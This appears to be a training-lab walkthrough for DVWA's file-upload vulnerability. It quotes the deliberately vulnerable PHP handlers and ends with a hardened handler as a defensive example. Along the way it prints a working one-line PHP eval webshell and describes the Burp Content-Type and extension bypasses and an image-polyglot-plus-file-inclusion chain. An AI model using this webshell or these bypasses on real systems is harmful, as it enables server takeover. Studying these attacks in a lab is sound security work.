Low
File Upload Source
vulnerabilities/upload/source/low.php
<?php
if( isset( $_POST[ 'Upload' ] ) ) {
    // Where are we going to be writing to?
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

    // Can we move the file to the upload folder?
    if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
        // No
        echo '<pre>Your image was not uploaded.</pre>';
    }
    else {
        // Yes!
        echo "<pre>{$target_path} succesfully uploaded!</pre>";
    }
}
?>
As the source shows, neither the server nor the client performs any check, so we can upload any file directly.
Here we upload a one-line webshell, shell.php:
<?php
@eval($_POST['shell']);
?>
The connection through AntSword succeeds.
Medium
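The client checks the type of the uploaded file, which must be an image format.
Method 1:
We can intercept the request with Burp Suite and change the uploaded file's Content-Type to bypass the check.
The upload succeeds, and we connect with AntSword.
Method 2:
We can first upload an image that contains the one-line webshell, then capture the request with Burp Suite and change the uploaded file's extension. This also bypasses the check, and AntSword can connect.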
High
<?php
if( isset( $_POST[ 'Upload' ] ) ) {
    // Where are we going to be writing to?
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

    // File information
    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
    $uploaded_ext  = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1);
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
    $uploaded_tmp  = $_FILES[ 'uploaded' ][ 'tmp_name' ];

    // Is it an image?
    if( ( strtolower( $uploaded_ext ) == "jpg" || strtolower( $uploaded_ext ) == "jpeg" || strtolower( $uploaded_ext ) == "png" ) &&
        ( $uploaded_size < 100000 ) &&
        getimagesize( $uploaded_tmp ) ) {
        // Can we move the file to the upload folder?
        if( !move_uploaded_file( $uploaded_tmp, $target_path ) ) {
            // No
            echo '<pre>Your image was not uploaded.</pre>';
        }
        else {
            // Yes!
            echo "<pre>{$target_path} succesfully uploaded!</pre>";
        }
    }
    else {
        // Invalid file
        echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
    }
}
?>
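The uploaded file's extension must be an image format, and getimagesize() is used to check whether the upload is an image.
Use copy xxx.php/a + xxx.jpg/b xxx.jpg to combine the image with the webshell to be uploaded.
But this way we cannot connect with AntSword, because the uploaded file is recognized as an image format.
We can use the file inclusion vulnerability to make the server treat it as a PHP file.
The AntSword connection succeeds.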
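
For comparison with the Low, Medium and High handlers above, here is a hardened upload handler. It is an added example, not DVWA's own code and not part of the original write-up. It closes the gaps each level leaves open: client-controlled type and name, and an image check that accepts files carrying extra bytes. UPLOAD_DIR and store_image_upload() are hypothetical names, and the upload directory is assumed to be configured so that the web server never executes scripts from it.

```php
<?php
// Added example (not DVWA's code): hardened replacement for the handlers above.
// Assumptions: form field 'uploaded' as on the page; UPLOAD_DIR is a hypothetical
// directory in which the web server is configured not to execute PHP.
const UPLOAD_DIR = __DIR__ . '/uploads/';   // hypothetical path
const MAX_BYTES  = 100000;                  // same size limit as the High level

function store_image_upload(array $file): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])
        || $file['size'] >= MAX_BYTES) {
        throw new RuntimeException('Upload rejected.');
    }

    // Decide the type from the file's bytes, never from the client-supplied
    // Content-Type or file name (both are controlled by the sender).
    $mime     = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    $decoders = ['image/jpeg' => 'imagecreatefromjpeg', 'image/png' => 'imagecreatefrompng'];
    if (!isset($decoders[$mime])) {
        throw new RuntimeException('Only JPEG or PNG images are accepted.');
    }

    // Decode and re-encode with GD: the stored file is written from the decoded
    // pixels, so trailing bytes and metadata of the original are not copied.
    $img = @$decoders[$mime]($file['tmp_name']);
    if ($img === false) {
        throw new RuntimeException('File is not a decodable image.');
    }

    // Server-chosen random name and extension; the original name is discarded.
    $ext  = $mime === 'image/jpeg' ? 'jpg' : 'png';
    $dest = UPLOAD_DIR . bin2hex(random_bytes(16)) . '.' . $ext;
    $ok   = $ext === 'jpg' ? imagejpeg($img, $dest, 90) : imagepng($img, $dest);
    if (!$ok) {
        throw new RuntimeException('Could not store image.');
    }
    return basename($dest);
}

if (isset($_POST['Upload'], $_FILES['uploaded'])) {
    try {
        echo '<pre>Stored as ' . htmlspecialchars(store_image_upload($_FILES['uploaded'])) . '</pre>';
    } catch (RuntimeException $e) {
        echo '<pre>' . htmlspecialchars($e->getMessage()) . '</pre>';
    }
}
```

The file inclusion step used at the High level is a separate flaw and has to be fixed in the include logic itself; this handler only ensures the stored file is a freshly encoded image with a server-chosen name.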